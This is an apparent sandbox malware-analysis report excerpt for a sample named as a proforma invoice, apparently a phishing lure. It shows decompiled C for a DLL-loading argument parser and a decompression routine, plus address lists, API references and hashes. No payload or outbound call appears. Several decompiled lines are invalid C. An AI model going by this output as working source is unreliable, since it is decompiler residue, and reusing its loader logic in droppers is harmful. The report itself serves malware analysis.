											if(_v20 != 0) {
												goto L57;
											}
											_v12 = _v12 - 1;
											__ebx = E6F731215();
											 &_v12 = E6F731A36( &_v12);
											__eax = E6F731429(__edx, __eax, __edx, __ebx);
											goto L97;
										case 5:
											L105:
											_v20 = _v20 + 1;
											goto L57;
										case 6:
											_push(7);
											goto L123;
										case 7:
											_push(0x19);
											goto L143;
										case 8:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L107;
										case 9:
											_push(0x15);
											goto L143;
										case 0xa:
											_push(0x16);
											goto L143;
										case 0xb:
											_push(0x18);
											goto L143;
										case 0xc:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L118;
										case 0xd:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L109;
										case 0xe:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L111;
										case 0xf:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L122;
										case 0x10:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L113;
										case 0x11:
											_push(3);
											goto L123;
										case 0x12:
											_push(0x17);
											L143:
											_pop(__ebx);
											goto L98;
										case 0x13:
											__eax =  &_v12;
											__eax = E6F731A36( &_v12);
											__ebx = __eax;
											__ebx = __eax + 1;
											__eflags = __ebx - 0xb;
											if(__ebx < 0xb) {
												__ebx = __ebx + 0xa;
											}
											goto L97;
										case 0x14:
											__ebx = 0xffffffff;
											goto L98;
										case 0x15:
											__eax = 0;
											__eflags = 0;
											goto L116;
										case 0x16:
											__ecx = 0;
											__eflags = 0;
											goto L91;
										case 0x17:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L120;
										case 0x18:
											_t270 =  *(_t329 + 0x814);
											__eflags = _t270 - _v16;
											if(_t270 > _v16) {
												_v16 = _t270;
											}
											_v8 = _v8 & 0x00000000;
											_v20 = _v20 & 0x00000000;
											_v36 - 3 = _t270 - (_v36 == 3);
											if(_t270 != _v36 == 3) {
												L85:
												_v40 = 1;
											}
											goto L57;
										case 0x19:
											L107:
											__ecx = 0;
											_v8 = 2;
											__ecx = 1;
											goto L91;
										case 0x1a:
											L118:
											_push(5);
											goto L123;
										case 0x1b:
											L109:
											__ecx = 0;
											_v8 = 3;
											__ecx = 1;
											goto L91;
										case 0x1c:
											L111:
											__ecx = 0;
											__ecx = 1;
											goto L91;
										case 0x1d:
											L122:
											_push(6);
											goto L123;
										case 0x1e:
											L113:
											_push(2);
											goto L123;
										case 0x1f:
											__eax =  &_v12;
											__eax = E6F731A36( &_v12);
											__ebx = __eax;
											__ebx = __eax + 1;
											goto L97;
										case 0x20:
											L116:
											_v52 = _v52 + 1;
											_push(3);
											_pop(__ecx);
											goto L91;
										case 0x21:
											L120:
											_push(4);
											L123:
											_pop(__ecx);
											L91:
											__edi = _v16;
											__edx =  *(0x6f73305c + __ecx * 4);
											__eax =  ~__eax;
											asm("sbb eax, eax");
											_v40 = 1;
											__edi = _v16 << 5;
											__eax = __eax & 0x00008000;
											__edi = (_v16 << 5) + __esi;
											__eax = __eax | __ecx;
											__eflags = _v8;
											 *(__edi + 0x818) = __eax;
											if(_v8 < 0) {
												L93:
												__edx = 0;
												__edx = 1;
												__eflags = 1;
												L94:
												__eflags = _v8 - 1;
												 *(__edi + 0x828) = __edx;
												if(_v8 == 1) {
													__eax =  &_v12;
													__eax = E6F731A36( &_v12);
													__eax = __eax + 1;
													__eflags = __eax;
													_v8 = __eax;
												}
												__eax = _v8;
												 *((intOrPtr*)(__edi + 0x81c)) = _v8;
												_t136 = _v16 + 0x41; // 0x41
												_t136 = _t136 << 5;
												__eax = 0;
												__eflags = 0;
												 *((intOrPtr*)((_t136 << 5) + __esi)) = 0;
												 *((intOrPtr*)(__edi + 0x830)) = 0;
												 *((intOrPtr*)(__edi + 0x82c)) = 0;
												L97:
												__eflags = __ebx;
												if(__ebx == 0) {
													goto L57;
												}
												L98:
												__eflags = _v20;
												_v40 = 1;
												if(_v20 != 0) {
													L103:
													__eflags = _v20 - 1;
													if(_v20 == 1) {
														__eax = _v16;
														__eax = _v16 << 5;
														__eflags = __eax;
														 *(__eax + __esi + 0x82c) = __ebx;
													}
													goto L105;
												}
												_v16 = _v16 << 5;
												_t144 = __esi + 0x830; // 0x830
												__edi = (_v16 << 5) + _t144;
												__eax =  *__edi;
												__eflags = __eax - 0xffffffff;
												if(__eax <= 0xffffffff) {
													L101:
													__eax = GlobalFree(__eax);
													L102:
													 *__edi = __ebx;
													goto L103;
												}
												__eflags = __eax - 0x19;
												if(__eax <= 0x19) {
													goto L102;
												}
												goto L101;
											}
											__eflags = __edx;
											if(__edx > 0) {
												goto L94;
											}
											goto L93;
										case 0x22:
											goto L57;
									}
								}
								_t271 = _t268 - 1;
								__eflags = _t271;
								if(_t271 == 0) {
									_v16 = _t282;
									goto L80;
								}
								__eflags = _t271 != 1;
								if(_t271 != 1) {
									goto L162;
								}
								__eflags = _t285 - 0x6e;
								if(__eflags > 0) {
									_t308 = _t285 - 0x72;
									__eflags = _t308;
									if(_t308 == 0) {
										_push(4);
										L74:
										_pop(_t273);
										L75:
										__eflags = _v8 - 1;
										if(_v8 != 1) {
											_t96 = _t329 + 0x810;
											 *_t96 =  *(_t329 + 0x810) &  !_t273;
											__eflags =  *_t96;
										} else {
											 *(_t329 + 0x810) =  *(_t329 + 0x810) | _t273;
										}
										_v8 = 1;
										goto L57;
									}
									_t311 = _t308 - 1;
									__eflags = _t311;
									if(_t311 == 0) {
										_push(0x10);
										goto L74;
									}
									__eflags = _t311 != 0;
									if(_t311 != 0) {
										goto L57;
									}
									_push(0x40);
									goto L74;
								}
								if(__eflags == 0) {
									_push(8);
									goto L74;
								}
								_t314 = _t285 - 0x21;
								__eflags = _t314;
								if(_t314 == 0) {
									_v8 =  ~_v8;
									goto L57;
								}
								_t315 = _t314 - 0x11;
								__eflags = _t315;
								if(_t315 == 0) {
									_t273 = 0x100;
									goto L75;
								}
								_t316 = _t315 - 0x31;
								__eflags = _t316;
								if(_t316 == 0) {
									_t273 = 1;
									goto L75;
								}
								__eflags = _t316 != 0;
								if(_t316 != 0) {
									goto L57;
								}
								_push(0x20);
								goto L74;
							} else {
								_v32 = _t282;
								_v36 = _t282;
								goto L20;
							}
						}
						__eflags =  *((char*)(_t320 - 1)) - 0x3a;
						if( *((char*)(_t320 - 1)) != 0x3a) {
							goto L17;
						}
						__eflags = _v32 - _t282;
						if(_v32 == _t282) {
							goto L43;
						}
						goto L17;
					}
					_t276 = _t257 - 5;
					if(_t276 == 0) {
						__eflags = _v44 - _t282;
						if(_v44 != _t282) {
							goto L43;
						} else {
							__eflags = _v36 - 3;
							_v32 = 1;
							_v8 = _t282;
							_v20 = _t282;
							_v16 = (0 | _v36 == 0x00000003) + 1;
							_v40 = _t282;
							goto L20;
						}
					}
					_t280 = _t276 - 1;
					if(_t280 == 0) {
						__eflags = _v44 - _t282;
						if(_v44 != _t282) {
							goto L43;
						} else {
							_v32 = 2;
							_v8 = _t282;
							_v20 = _t282;
							goto L20;
						}
					}
					if(_t280 != 0x16) {
						goto L43;
					} else {
						_v32 = 3;
						_v8 = 1;
						goto L20;
					}
				}
				GlobalFree(_v56);
				GlobalFree(_v24);
				GlobalFree(_v48);
				if(_t329 == _t282 ||  *(_t329 + 0x80c) != _t282) {
					L182:
					return _t329;
				} else {
					_t224 =  *_t329 - 1;
					if(_t224 == 0) {
						_t187 = _t329 + 8; // 0x8
						_t323 = _t187;
						__eflags =  *_t323;
						if( *_t323 != 0) {
							_t225 = GetModuleHandleA(_t323);
							__eflags = _t225 - _t282;
							 *(_t329 + 0x808) = _t225;
							if(_t225 != _t282) {
								L171:
								_t192 = _t329 + 0x408; // 0x408
								_t324 = _t192;
								_t226 = E6F7315C2( *(_t329 + 0x808), _t324);
								__eflags = _t226 - _t282;
								 *(_t329 + 0x80c) = _t226;
								if(_t226 == _t282) {
									__eflags =  *_t324 - 0x23;
									if( *_t324 == 0x23) {
										_t195 = _t329 + 0x409; // 0x409
										_t230 = E6F7312FE(_t195);
										__eflags = _t230 - _t282;
										if(_t230 != _t282) {
											__eflags = _t230 & 0xffff0000;
											if((_t230 & 0xffff0000) == 0) {
												 *(_t329 + 0x80c) = GetProcAddress( *(_t329 + 0x808), _t230 & 0x0000ffff);
											}
										}
									}
								}
								__eflags = _v52 - _t282;
								if(_v52 != _t282) {
									L178:
									_t324[lstrlenA(_t324)] = 0x41;
									_t228 = E6F7315C2( *(_t329 + 0x808), _t324);
									__eflags = _t228 - _t282;
									if(_t228 != _t282) {
										L166:
										 *(_t329 + 0x80c) = _t228;
										goto L182;
									}
									__eflags =  *(_t329 + 0x80c) - _t282;
									L180:
									if(__eflags != 0) {
										goto L182;
									}
									L181:
									_t205 = _t329 + 4;
									 *_t205 =  *(_t329 + 4) | 0xffffffff;
									__eflags =  *_t205;
									goto L182;
								} else {
									__eflags =  *(_t329 + 0x80c) - _t282;
									if( *(_t329 + 0x80c) != _t282) {
										goto L182;
									}
									goto L178;
								}
							}
							_t233 = LoadLibraryA(_t323);
							__eflags = _t233 - _t282;
							 *(_t329 + 0x808) = _t233;
							if(_t233 == _t282) {
								goto L181;
							}
							goto L171;
						}
						_t188 = _t329 + 0x408; // 0x408
						_t235 = E6F7312FE(_t188);
						 *(_t329 + 0x80c) = _t235;
						__eflags = _t235 - _t282;
						goto L180;
					}
					_t236 = _t224 - 1;
					if(_t236 == 0) {
						_t185 = _t329 + 0x408; // 0x408
						_t237 = _t185;
						__eflags =  *_t237;
						if( *_t237 == 0) {
							goto L182;
						}
						_t228 = E6F7312FE(_t237);
						L165:
						goto L166;
					}
					if(_t236 != 1) {
						goto L182;
					}
					_t81 = _t329 + 8; // 0x8
					_t283 = _t81;
					_t325 = E6F7312FE(_t81);
					 *(_t329 + 0x808) = _t325;
					if(_t325 == 0) {
						goto L181;
					}
					 *(_t329 + 0x84c) =  *(_t329 + 0x84c) & 0x00000000;
					 *((intOrPtr*)(_t329 + 0x850)) = E6F731224(_t283);
					 *(_t329 + 0x83c) =  *(_t329 + 0x83c) & 0x00000000;
					 *((intOrPtr*)(_t329 + 0x848)) = 1;
					 *((intOrPtr*)(_t329 + 0x838)) = 1;
					_t90 = _t329 + 0x408; // 0x408
					_t228 =  *(_t325->i + E6F7312FE(_t90) * 4);
					goto L165;
				}
			}

0x6f731aa0
0x6f731aa3
0x6f731aa6
0x6f731aa9
0x6f731aac
0x6f731aaf
0x6f731ab2
0x6f731ab4
0x6f731ab7
0x6f731aba
0x6f731abf
0x6f731ac2
0x6f731aca
0x6f731ad2
0x6f731ad4
0x6f731ad7
0x6f731adf
0x6f731adf
0x6f731ae4
0x6f731ae7
0x00000000
0x00000000
0x6f731af1
0x6f731af3
0x6f731af8
0x6f731afa
0x6f731b8b
0x6f731b8b
0x6f731b8b
0x6f731b8f
0x6f731b92
0x6f731b94
0x6f731bb6
0x6f731bb9
0x6f731bbb
0x6f731bc4
0x6f731bca
0x6f731bcc
0x6f731bd2
0x6f731bd2
0x6f731bd8
0x6f731bdb
0x6f731bdb
0x6f731bde
0x6f731bde
0x6f731be4
0x6f731be6
0x6f731be9
0x6f731bef
0x6f731bf2
0x6f731bf2
0x6f731bf4
0x6f731bfa
0x6f731bfd
0x6f731c21
0x6f731c24
0x00000000
0x00000000
0x6f731c27
0x6f731c29
0x6f731c37
0x6f731c3a
0x6f731c3c
0x00000000
0x00000000
0x00000000
0x00000000
0x6f731c3e
0x6f731c3e
0x6f731c3e
0x6f731c44
0x6f731c46
0x00000000
0x00000000
0x6f731c48
0x6f731c4a
0x6f731c4c
0x6f731c4e
0x00000000
0x00000000
0x00000000
0x6f731c4e
0x6f731c50
0x6f731c52
0x6f731c54
0x6f731c54
0x6f731c5a
0x6f731c60
0x6f731c62
0x6f731c76
0x6f731c76
0x6f731c78
0x6f731c64
0x6f731c6a
0x6f731c6d
0x6f731c6d
0x00000000
0x6f731bff
0x6f731bff
0x6f731bff
0x6f731c00
0x6f731c08
0x6f731c0c
0x6f731c12
0x6f731c16
0x00000000
0x6f731c16
0x6f731c02
0x6f731c02
0x6f731c03
0x00000000
0x00000000
0x6f731c05
0x6f731c06
0x00000000
0x00000000
0x00000000
0x6f731c06
0x6f731b96
0x6f731b97
0x6f731ba0
0x6f731ba3
0x6f731bb0
0x6f731bb0
0x6f731ba5
0x6f731ba5
0x6f731c7e
0x6f731c81
0x6f731c84
0x6f731cf6
0x6f731cfa
0x6f731adc
0x00000000
0x6f731adc
0x00000000
0x6f731cfa
0x6f731b94
0x6f731b00
0x6f731b03
0x6f731b66
0x6f731b69
0x6f731b7a
0x6f731b7a
0x6f731b7d
0x6f731c89
0x6f731c8c
0x6f731c8c
0x6f731c8e
0x6f732033
0x6f732045
0x6f732045
0x6f732047
0x00000000
0x00000000
0x6f732037
0x6f732038
0x6f73203b
0x6f73203e
0x6f7320ba
0x6f7320c1
0x6f7320c6
0x6f7320c9
0x6f731cf2
0x6f731cf2
0x6f731cf2
0x6f731cf3
0x00000000
0x6f731cf3
0x6f732040
0x6f732042
0x6f732042
0x6f732049
0x6f73204b
0x6f7320ae
0x6f731ce7
0x6f731cea
0x6f731ced
0x6f731cf0
0x6f731cf0
0x00000000
0x6f731cf0
0x6f73204d
0x6f73204f
0x6f732055
0x6f732055
0x6f732057
0x6f73205a
0x6f73206d
0x6f73206d
0x6f732070
0x6f732073
0x00000000
0x00000000
0x6f732075
0x6f732078
0x00000000
0x00000000
0x6f73207a
0x6f732081
0x6f732081
0x6f732087
0x6f73208a
0x6f7320a6
0x6f73208c
0x6f732095
0x6f732098
0x6f732098
0x00000000
0x6f73208a
0x6f73205c
0x6f73205f
0x6f732062
0x00000000
0x00000000
0x6f732064
0x00000000
0x6f732064
0x6f732051
0x6f732053
0x00000000
0x00000000
0x00000000
0x6f732053
0x6f731c94
0x6f731c94
0x6f731c95
0x6f731dde
0x6f731dde
0x6f731de5
0x6f731de8
0x00000000
0x00000000
0x6f731df5
0x00000000
0x6f731fdb
0x6f731fde
0x6f731fe1
0x6f731fe1
0x6f731fe2
0x6f731fe5
0x6f731fe7
0x6f731fe9
0x00000000
0x00000000
0x6f731feb
0x6f731feb
0x6f731fee
0x6f732000
0x6f732003
0x6f732006
0x6f73200c
0x00000000
0x6f73200c
0x6f731ff0
0x6f731ff0
0x6f731ff2
0x00000000
0x00000000
0x6f731ff4
0x6f731ff6
0x6f731ff8
0x6f731ff8
0x6f731ff8
0x6f731ff9
0x6f731ffb
0x6f731ffd
0x6f731fe1
0x6f731fe2
0x6f731fe5
0x6f731fe7
0x6f731fe9
0x00000000
0x00000000
0x00000000
0x6f731fe9
0x00000000
0x6f731e3c
0x00000000
0x00000000
0x6f731e48
0x00000000
0x00000000
0x6f731e2f
0x6f731e33
0x6f731e37
0x00000000
0x00000000
0x6f731fad
0x6f731fb1
0x00000000
0x00000000
0x6f731fb7
0x6f731fbf
0x6f731fc6
0x6f731fce
0x00000000
0x00000000
0x6f731f15
0x6f731f15
0x00000000
0x00000000
0x6f731e51
0x00000000
0x00000000
0x6f73202b
0x00000000
0x00000000
0x6f731f1d
0x6f731f1f
0x6f731f1f
0x00000000
0x00000000
0x6f73201b
0x00000000
0x00000000
0x6f73201f
0x00000000
0x00000000
0x6f732027
0x00000000
0x00000000
0x6f731f64
0x6f731f66
0x6f731f66
0x00000000
0x00000000
0x6f731f2f
0x6f731f31
0x6f731f31
0x00000000
0x00000000
0x6f731f41
0x6f731f43
0x6f731f43
0x00000000
0x00000000
0x6f731f72
0x6f731f74
0x6f731f74
0x00000000
0x00000000
0x6f731f4c
0x6f731f4e
0x6f731f4e
0x00000000
0x00000000
0x6f731f53
0x00000000
0x00000000
0x6f732023
0x6f73202d
0x6f73202d
0x00000000
0x00000000
0x6f731f7d
0x6f731f81
0x6f731f86
0x6f731f89
0x6f731f8a
0x6f731f8d
0x6f731f93
0x6f731f93
0x00000000
0x00000000
0x6f732013
0x00000000
0x00000000
0x6f731f57
0x6f731f57
0x00000000
0x00000000
0x6f731e58
0x6f731e58
0x00000000
0x00000000
0x6f731f6b
0x6f731f6d
0x6f731f6d
0x00000000
0x00000000
0x6f731dfc
0x6f731e02
0x6f731e05
0x6f731e07
0x6f731e07
0x6f731e0a
0x6f731e0e
0x6f731e1b
0x6f731e1d
0x6f731e23
0x6f731e23
0x6f731e23
0x00000000
0x00000000
0x6f731f20
0x6f731f20
0x6f731f22
0x6f731f29
0x00000000
0x00000000
0x6f731f67
0x6f731f67
0x00000000
0x00000000
0x6f731f32
0x6f731f32
0x6f731f34
0x6f731f3b
0x00000000
0x00000000
0x6f731f44
0x6f731f44
0x6f731f46
0x00000000
0x00000000
0x6f731f75
0x6f731f75
0x00000000
0x00000000
0x6f731f4f
0x6f731f4f
0x00000000
0x00000000
0x6f731f9b
0x6f731f9f
0x6f731fa4
0x6f731fa7
0x00000000
0x00000000
0x6f731f59
0x6f731f59
0x6f731f5c
0x6f731f5e
0x00000000
0x00000000
0x6f731f6e
0x6f731f6e
0x6f731f77
0x6f731f77
0x6f731e5a
0x6f731e5a
0x6f731e5d
0x6f731e64
0x6f731e66
0x6f731e68
0x6f731e6f
0x6f731e72
0x6f731e77
0x6f731e79
0x6f731e7b
0x6f731e7f
0x6f731e85
0x6f731e8b
0x6f731e8b
0x6f731e8d
0x6f731e8d
0x6f731e8e
0x6f731e8e
0x6f731e92
0x6f731e98
0x6f731e9a
0x6f731e9e
0x6f731ea3
0x6f731ea3
0x6f731ea5
0x6f731ea5
0x6f731ea8
0x6f731eab
0x6f731eb4
0x6f731eb7
0x6f731eba
0x6f731eba
0x6f731ebc
0x6f731ebf
0x6f731ec5
0x6f731ecb
0x6f731ecb
0x6f731ecd
0x00000000
0x00000000
0x6f731ed3
0x6f731ed3
0x6f731ed7
0x6f731ede
0x6f731f02
0x6f731f02
0x6f731f06
0x6f731f08
0x6f731f0b
0x6f731f0b
0x6f731f0e
0x6f731f0e
0x00000000
0x6f731f06
0x6f731ee3
0x6f731ee6
0x6f731ee6
0x6f731eed
0x6f731eef
0x6f731ef2
0x6f731ef9
0x6f731efa
0x6f731f00
0x6f731f00
0x00000000
0x6f731f00
0x6f731ef4
0x6f731ef7
0x00000000
0x00000000
0x00000000
0x6f731ef7
0x6f731e87
0x6f731e89
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6f731df5
0x6f731c9b
0x6f731c9b
0x6f731c9c
0x6f731ddb
0x00000000
0x6f731ddb
0x6f731ca2
0x6f731ca3
0x00000000
0x00000000
0x6f731ca9
0x6f731cac
0x6f731da0
0x6f731da0
0x6f731da3
0x6f731db8
0x6f731dba
0x6f731dba
0x6f731dbb
0x6f731dbe
0x6f731dc1
0x6f731dcd
0x6f731dcd
0x6f731dcd
0x6f731dc3
0x6f731dc3
0x6f731dc3
0x6f731dd3
0x00000000
0x6f731dd3
0x6f731da5
0x6f731da5
0x6f731da6
0x6f731db4
0x00000000
0x6f731db4
0x6f731da9
0x6f731daa
0x00000000
0x00000000
0x6f731db0
0x00000000
0x6f731db0
0x6f731cb2
0x6f731d9c
0x00000000
0x6f731d9c
0x6f731cb8
0x6f731cb8
0x6f731cbb
0x6f731ce4
0x00000000
0x6f731ce4
0x6f731cbd
0x6f731cbd
0x6f731cc0
0x6f731cda
0x00000000
0x6f731cda
0x6f731cc2
0x6f731cc2
0x6f731cc5
0x6f731cd4
0x00000000
0x6f731cd4
0x6f731cc8
0x6f731cc9
0x00000000
0x00000000
0x6f731ccb
0x00000000
0x6f731b83
0x6f731b83
0x6f731b86
0x00000000
0x6f731b86
0x6f731b7d
0x6f731b6b
0x6f731b6f
0x00000000
0x00000000
0x6f731b71
0x6f731b74
0x00000000
0x00000000
0x00000000
0x6f731b74
0x6f731b05
0x6f731b08
0x6f731b3e
0x6f731b41
0x00000000
0x6f731b47
0x6f731b49
0x6f731b4d
0x6f731b54
0x6f731b5b
0x6f731b5e
0x6f731b61
0x00000000
0x6f731b61
0x6f731b41
0x6f731b0a
0x6f731b0b
0x6f731b26
0x6f731b29
0x00000000
0x6f731b2f
0x6f731b2f
0x6f731b36
0x6f731b39
0x00000000
0x6f731b39
0x6f731b29
0x6f731b10
0x00000000
0x6f731b16
0x6f731b16
0x6f731b1d
0x00000000
0x6f731b1d
0x6f731b10
0x6f731d09
0x6f731d0e
0x6f731d13
0x6f731d17
0x6f7321c6
0x6f7321cc
0x6f731d29
0x6f731d2b
0x6f731d2c
0x6f7320f1
0x6f7320f1
0x6f7320f4
0x6f7320f7
0x6f732114
0x6f73211a
0x6f73211c
0x6f732122
0x6f732139
0x6f732139
0x6f732139
0x6f732146
0x6f73214c
0x6f73214f
0x6f732155
0x6f732157
0x6f73215a
0x6f73215c
0x6f732163
0x6f732168
0x6f73216b
0x6f73216d
0x6f732172
0x6f732184
0x6f732184
0x6f732172
0x6f73216b
0x6f73215a
0x6f73218a
0x6f73218d
0x6f732197
0x6f73219f
0x6f7321ab
0x6f7321b1
0x6f7321b4
0x6f7320e6
0x6f7320e6
0x00000000
0x6f7320e6
0x6f7321ba
0x6f7321c0
0x6f7321c0
0x00000000
0x00000000
0x6f7321c2
0x6f7321c2
0x6f7321c2
0x6f7321c2
0x00000000
0x6f73218f
0x6f73218f
0x6f732195
0x00000000
0x00000000
0x00000000
0x6f732195
0x6f73218d
0x6f732125
0x6f73212b
0x6f73212d
0x6f732133
0x00000000
0x00000000
0x00000000
0x6f732133
0x6f7320f9
0x6f732100
0x6f732106
0x6f73210c
0x00000000
0x6f73210c
0x6f731d32
0x6f731d33
0x6f7320d0
0x6f7320d0
0x6f7320d6
0x6f7320d9
0x00000000
0x00000000
0x6f7320e0
0x6f7320e5
0x00000000
0x6f7320e5
0x6f731d3a
0x00000000
0x00000000
0x6f731d40
0x6f731d40
0x6f731d49
0x6f731d4e
0x6f731d54
0x00000000
0x00000000
0x6f731d5a
0x6f731d67
0x6f731d6d
0x6f731d77
0x6f731d7d
0x6f731d85
0x6f731d95
0x00000000
0x6f731d95

APIs

Part of subcall function 6F731215: GlobalAlloc.KERNELBASE(00000040,6F731233,?,6F7312CF,-6F73404B,6F7311AB,-000000A0), ref: 6F73121D

GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 6F731BC4
lstrcpyA.KERNEL32(00000008,?), ref: 6F731C0C
lstrcpyA.KERNEL32(00000408,?), ref: 6F731C16
GlobalFree.KERNEL32 ref: 6F731C29
GlobalFree.KERNEL32 ref: 6F731D09
GlobalFree.KERNEL32 ref: 6F731D0E
GlobalFree.KERNEL32 ref: 6F731D13
GlobalFree.KERNEL32 ref: 6F731EFA
lstrcpyA.KERNEL32(?,?), ref: 6F732098
GetModuleHandleA.KERNEL32(00000008), ref: 6F732114
LoadLibraryA.KERNEL32(00000008), ref: 6F732125
GetProcAddress.KERNEL32(?,?), ref: 6F73217E
lstrlenA.KERNEL32(00000408), ref: 6F732198

Memory Dump Source

Source File: 00000000.00000002.658919807.000000006F731000.00000020.00020000.sdmp, Offset: 6F730000, based on PE: true

Associated: 00000000.00000002.658908947.000000006F730000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.658929430.000000006F733000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.658938298.000000006F735000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f730000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
String ID:
API String ID: 245916457-0
Opcode ID: 43a2a3f1c890399c90ee46da14e824324dc2bc01a0a5587818765166e40f2372
Instruction ID: 100d4e5a227bf7d6d17360648902f26fd4f7aa927a10cc4fffb7424fad90014e
Opcode Fuzzy Hash: 43a2a3f1c890399c90ee46da14e824324dc2bc01a0a5587818765166e40f2372
Instruction Fuzzy Hash: 9D228D73D4462ABEDB108FB8C7847EDBBF0BF06315F20863AD1A5A6182D7B46541CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00406131, Relevance: 5.4, APIs: 4, Instructions: 382
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00406131() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
